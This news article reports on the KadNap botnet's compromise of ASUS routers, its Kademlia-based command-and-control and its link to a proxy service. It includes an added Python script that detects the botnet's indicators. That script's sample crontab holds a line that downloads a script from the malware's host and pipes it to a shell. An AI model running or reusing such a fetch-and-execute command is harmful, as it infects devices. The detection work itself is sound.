A newly identified botnet malware known as KadNap is specifically targeting ASUS routers and other edge networking devices, transforming them into proxies for malicious cyber activities. Since its emergence in August 2025, KadNap has reportedly compromised approximately 14,000 devices, forming a peer-to-peer network that communicates with a decentralized command-and-control (C2) infrastructure utilizing a customized version of the Kademlia Distributed Hash Table (DHT) protocol.
The unique architecture of KadNap complicates efforts to identify and dismantle its C2 servers. Each node within the network manages a portion of the overall data, making traditional tracking methods ineffective. According to researchers at Black Lotus Labs, the threat research division of Lumen Technologies, nearly half of the KadNap network links to C2 infrastructure specifically designed for ASUS-based bots, while the remaining nodes interact with two separate control servers.
Significantly, the majority of infected devices are located in the United States, accounting for approximately 60% of total infections, followed by notable percentages in Taiwan, Hong Kong, and Russia. The infection process begins when devices download a malicious script from the IP address 212.104.141[.]140, which establishes persistence through a cron job that executes every 55 minutes. The main payload, an ELF binary known as kad, installs the KadNap client, which then identifies the host’s external IP address and retrieves the current time and system uptime from multiple Network Time Protocol (NTP) servers.
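The infection chain above gives defenders two concrete things to sweep for: crontab entries that fetch from the download host or launch a binary named kad, and connection records to that host. The following is an added example (not code from the article or from Black Lotus Labs) that runs both checks over constructed crontab text and constructed key=value connection-log lines; the log format and the sample entries are assumptions.

```python
import re

# Indicators the article names (the report prints the IP defanged as
# 212.104.141[.]140); everything else in this block is constructed.
KADNAP_DOWNLOAD_IP = "212.104.141.140"
KADNAP_BINARY = "kad"   # ELF payload that installs the KadNap client

# Five crontab schedule fields, then the command; bare 'kad' as a command word.
CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<cmd>.+)$")
KAD_CMD_RE = re.compile(r"(?:^|[\s/;|&])" + re.escape(KADNAP_BINARY) + r"(?=[\s;|&]|$)")

def suspicious_cron_entries(crontab_text: str) -> list:
    """Return (line, reason) for entries that fetch from the download host
    or run a binary named 'kad'; comments, blanks and benign jobs yield nothing."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = CRON_RE.match(stripped)
        if not m:
            continue
        cmd = m.group("cmd")
        if KADNAP_DOWNLOAD_IP in cmd:
            hits.append((stripped, "fetches from KadNap download host"))
        elif KAD_CMD_RE.search(cmd):
            hits.append((stripped, "runs a binary named 'kad'"))
    return hits

def connections_to_ioc(log_lines) -> list:
    """Return key=value connection-log lines whose dst= is the download host."""
    hits = []
    for line in log_lines:
        fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
        if fields.get("dst") == KADNAP_DOWNLOAD_IP:
            hits.append(line)
    return hits

# Constructed sample input; the */55 schedule is a stand-in for the
# 55-minute cadence the article describes, not a recovered crontab.
SAMPLE_CRONTAB = """\
0 3 * * * /sbin/logrotate
*/55 * * * * wget -q http://212.104.141.140/x.sh -O- | sh
*/55 * * * * /tmp/kad
"""
SAMPLE_LOG = [
    "ts=2025-09-01T12:00:00Z src=192.0.2.10 dst=212.104.141.140 dport=80 proto=tcp",
    "ts=2025-09-01T12:00:05Z src=192.0.2.10 dst=198.51.100.7 dport=443 proto=tcp",
]
```

On a router, the crontab text would come from the device's cron spool and the log lines from an upstream firewall or flow collector; a hit on either check is a reason to re-image the device rather than just delete the job.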
KadNap’s evasion tactics include the use of a modified Kademlia-based DHT protocol that helps obscure the IP addresses of its infrastructure within a peer-to-peer system. As noted by Black Lotus Labs, “KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring.” This sophisticated method allows infected devices to connect seamlessly to the C2 servers while complicating detection efforts for cybersecurity defenders.
Despite its decentralized nature, researchers found that KadNap’s implementation of Kademlia is weakened by a consistent connection to two specific nodes prior to reaching the C2 servers. This dependency on fixed nodes reduces the potential decentralization of the protocol, enabling more straightforward identification of the control infrastructure.
Furthermore, the KadNap botnet is linked to the Doppelganger proxy service, believed to be a rebranding of the Faceless service, which was previously associated with the TheMoon malware botnet. Doppelganger markets access to infected devices as residential proxies, facilitating malicious activities such as launching distributed denial-of-service (DDoS) attacks, conducting credential stuffing, and executing brute-force attacks—all of which can exploit KadNap victims.
In response to this emerging threat, Lumen Technologies has taken proactive steps to mitigate the impact of the KadNap botnet. As of the publication date, the company reported that it had “blocked all network traffic to or from the control infrastructure.” While this disruption is limited to Lumen’s network, the organization plans to release a list of indicators of compromise to assist other entities in addressing the botnet on their systems.
The rise of the KadNap botnet underscores the ongoing challenges in cybersecurity, particularly regarding the security of home networking devices. As cybercriminals continue to evolve their tactics, vigilance and updated security measures become increasingly essential for individuals and organizations alike.